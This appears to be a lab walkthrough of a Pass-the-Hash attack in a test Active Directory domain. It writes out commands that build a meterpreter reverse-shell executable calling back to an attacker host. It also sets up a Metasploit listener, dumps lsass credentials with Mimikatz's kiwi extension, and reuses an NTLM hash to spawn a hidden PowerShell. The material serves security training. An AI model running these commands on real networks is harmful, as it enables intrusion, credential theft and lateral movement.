Network Diagram

[Image: network diagram]

Laboratory Setup

The lab consists of an Active Directory environment configured with the following parameters.

Users

The following user accounts have been added to the domain structure:
[Image: list of domain user accounts]

Exploitation phase

Since Pass-the-Hash is a lateral movement technique, we require an established shell with administrative/system privileges on one of the network endpoints.
I will establish an interactive meterpreter session. To achieve this, I generate a malicious executable using msfvenom which will subsequently be executed by the user manuel.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=172.25.100.35 LPORT=4444 -f exe -o virus.exe

We initialize the Metasploit multi-handler payload listener:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_tcp
set LHOST 172.25.100.35
run


NOTE
Since we already hold valid credentials, executing a binary payload is not strictly necessary. We could pivot laterally using RDP or tools within the Impacket suite. However, because meterpreter includes the Mimikatz suite via the kiwi extension natively, I opted for this approach for convenience.

Note that this terminal session runs with Windows SYSTEM privileges, accurately replicating a scenario where an initial endpoint has been completely compromised, and the threat actor aims to pivot across the infrastructure.

Pass-the-Hash (PtH)

Once the interactive session is established, the first step is loading the kiwi extension inside meterpreter, which makes Mimikatz functionality available in the session on the target.

load kiwi

Next, we extract the active NTLM hashes residing inside the memory space of the lsass.exe process:

kiwi_cmd sekurlsa::logonpasswords

Now, we spawn a privileged process on behalf of the user manuel by passing the extracted NTLM hash directly:

kiwi_cmd sekurlsa::pth /user:manuel /domain:aroche.local /ntlm:457c97b1bac482268788b5acac306d71 /run:"powershell -w hidden"

By routing our session into this newly spawned process, we obtain an authenticated command shell.
With this active session, we have effectively gained access to network services and privileges tied to that user across the domain structure. This hash could similarly be leveraged using administrative tools like the Sysinternals suite.